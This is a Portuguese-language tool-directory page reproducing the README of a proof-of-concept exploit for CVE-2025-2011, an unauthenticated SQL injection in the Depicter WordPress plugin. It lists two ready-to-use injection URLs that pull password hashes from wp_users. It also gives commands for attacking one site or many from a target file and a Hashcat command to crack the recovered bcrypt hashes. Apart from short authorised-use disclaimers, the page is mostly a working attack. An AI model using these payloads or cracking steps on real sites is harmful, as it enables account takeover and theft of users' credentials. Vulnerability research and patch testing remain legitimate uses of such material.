Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-2011 — Exploit for CVE-2025-2011 | Kitploit
Ferramentas/GitHubGitHub/x3rx3ssec/cve-2025-2011
Password CrackingVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubx3rx3ssec/cve-2025-2011

CVE-2025-2011

Exploit for CVE-2025-2011

Ver Repositório
1há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-2011 PoC

Por: X3RX3S Mas orgulhosamente roubado por Ash Wesker que usou GPT no meu código com o banner dele ;) veja aqui ---> https://github.com/Ashwesker/Blackash-CVE-2025-2011 Você pode até ver meu nome de usuário no código 'dele' -_-'

Propósito: Uma ferramenta de prova de conceito para testar uma vulnerabilidade de injeção SQL (CVE-2025-2011) em sites WordPress.
Aviso: Use apenas em sistemas que você possui ou para os quais tenha permissão explícita por escrito. Testes não autorizados são ilegais e antiéticos. Screenshot From 2025-11-02 19-44-16


Sobre a vulnerabilidade :)

  • O plugin Slider & Popup Builder by Depicter para WordPress é vulnerável a uma injeção SQL genérica através do parâmetro 's' em todas as versões até, e incluindo, 3.6.1 devido à falta de escape adequado no parâmetro fornecido pelo usuário e à falta de preparação suficiente na consulta SQL existente. Isso permite que atacantes não autenticados anexem consultas SQL adicionais às consultas já existentes, que podem ser usadas para extrair informações sensíveis do banco de dados.

Funcionalidades

  • Dois payloads de SQLi (selecionáveis com -p 1 ou -p 2)
  • Detecção de hash Bcrypt ($2a$, $2b$, $2y$), incluindo variantes prefixadas com $wp$
  • Resultados salvos por hostname: results_<hostname>.txt
  • Integração opcional com Hashcat para bcrypt (-m 3200) com um prompt
  • Suporta URL única (-u) ou múltiplos alvos via arquivo (-f)

Requisitos

  • Python 3.8+
  • Pacotes pip:
    • requests
    • colorama

Instale as dependências:

root@kitploit:~
pip install requests colorama

Opcional (para quebra de hashes):

  • hashcat instalado e disponível no seu PATH (padrão é /usr/share/wordlists/rockyou.txt)
  • Uma wordlist como /usr/share/wordlists/rockyou.txt

Uso

Torner o script executável (opcional):

root@kitploit:~
chmod +x CVE-2025-2011.py

Alvo único (payload 1 padrão):

root@kitploit:~
python3 CVE-2025-2011.py -u https://example.com

Alvo único (payload 2):

root@kitploit:~
python3 CVE-2025-2011.py -u https://example.com -p 2

Múltiplos alvos a partir de arquivo (uma URL por linha):

root@kitploit:~
python3 CVE-2025-2011.py -f targets.txt

Saída

Para cada host testado, o script salva um arquivo de resultado:

root@kitploit:~
results_<hostname>.txt

Se hashes bcrypt forem encontrados, eles são salvos em hashes.txt e você será solicitado a quebrá-los com Hashcat. Exemplo de comando Hashcat usado pelo script:

root@kitploit:~
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt

Nota: bcrypt é lento por design. A quebra pode levar muito tempo e exigir GPUs.


Payloads

  • Payload 1 (padrão):
root@kitploit:~
/wp-admin/admin-ajax.php?action=depicter-lead-index&s=test%27)+UNION+select+user_pass,2,3,4,5+FROM+wp_users--+x
  • Payload 2:
root@kitploit:~
/wp-admin/admin-ajax.php?action=depicter-lead-list&s=test%27))+table_name+UNION+select+user_pass+FROM+wp_users--+x

Uso Legal e Responsável

Esta ferramenta é fornecida apenas para fins educacionais e defensivos. Não a utilize contra sistemas para os quais você não tenha permissão explícita. O autor e o distribuidor não assumem qualquer responsabilidade pelo uso indevido. Sempre obtenha autorização por escrito antes de executar testes contra alvos que você não possui.


Notas e Ajustes

  • Se você tiver wordlists diferentes, atualize a função run_hashcat no script para apontar para sua lista preferida.
  • Se o Hashcat não estiver instalado ou você preferir não quebrar hashes, responda N quando solicitado.
  • Você pode ajustar timeouts e comportamento de threads no script para varreduras em larga escala.

Montado por

  • X3RX3S
  • Inspirado por fluxos de trabalho de pesquisa de segurança responsável e Chocapikk (https://github.com/Chocapikk)
Baixar ferramenta